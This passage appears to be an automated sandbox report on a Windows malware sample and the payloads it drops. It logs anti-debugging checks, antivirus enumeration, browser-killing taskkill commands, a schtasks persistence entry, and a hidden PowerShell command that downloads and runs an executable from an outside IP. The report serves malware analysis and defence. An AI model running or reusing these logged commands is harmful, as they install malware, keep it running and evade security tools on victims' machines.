Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe

Code function: 3_2_05330BBC rdtsc

3_2_05330BBC

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C54AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6C54AC62

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CF652B mov eax, dword ptr fs:[00000030h]		3_2_00CF652B
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Code function: 3_2_00CFA302 mov eax, dword ptr fs:[00000030h]		3_2_00CFA302

Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C54AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6C54AC62

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_3940.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6668.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: AGDDD2MYZL6KQO94XW.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 275588fe9c.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 4960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 5356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mshta.exe PID: 6184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 48b7eec64e.exe PID: 8016, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe "C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe "C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe "C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe "C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe "C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe "C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe "C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe "C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe "C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe "C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zr4ZjmaFwoT /tr "mshta C:\Users\user\AppData\Local\Temp\9OAIPrhRB.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE "C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C594760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

2_2_6C594760

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C471C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

2_2_6C471C30

Source: f8fdf848d8.exe, 00000013.00000000.2580741835.0000000000E52000.00000002.00000001.01000000.00000016.sdmp, ec93a94e48.exe, 00000016.00000000.2627404382.00000000006C2000.00000002.00000001.01000000.00000017.sdmp, f8fdf848d8.exe, 00000031.00000000.2809098327.0000000000E52000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 5f198671b1.exe, 0000000C.00000002.2456973871.000000000133F000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: zZProgram Manager
Source: AGDDD2MYZL6KQO94XW.exe, AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2178297747.0000000001326000.00000040.00000001.01000000.00000006.sdmp, 48b7eec64e.exe, 00000012.00000002.2600109976.0000000001226000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: gProgram Manager
Source: 1cfdc82c16.exe, 0000000D.00000002.2547566419.0000000000C09000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: 5Program Manager
Source: HYCURX00F7L1ZQ3FYN.exe, HYCURX00F7L1ZQ3FYN.exe, 00000003.00000002.1954123241.0000000000EFF000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1982913908.00000000009BF000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000007.00000002.1986071869.00000000009BF000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: JProgram Manager

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C54AE71 cpuid

2_2_6C54AE71

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\random.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062357001\fee976e9bb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062359001\51c549c9c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1062359001\51c549c9c2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062356001\071b4af2c1.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1062358001\f64eac2185.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\NEGM0426B51QOF76X3GO8.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C54A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_6C54A8DC

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Code function: 2_2_6C498390 NSS_GetVersion,

2_2_6C498390

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 5f198671b1.exe, 0000000C.00000002.2454320259.0000000000FF5000.00000040.00000001.01000000.00000010.sdmp, 5f198671b1.exe, 0000000C.00000003.2320656696.0000000007614000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: 1cfdc82c16.exe, 0000000D.00000003.2523721387.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2535589796.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2496681237.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2497594514.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2507111533.000000000538E000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2496681237.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2563604623.000000000539C000.00000004.00000800.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000003.2534792606.000000000071D000.00000004.00000020.00020000.00000000.sdmp, 1cfdc82c16.exe, 0000000D.00000002.2543644073.000000000071D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1062350001\275588fe9c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
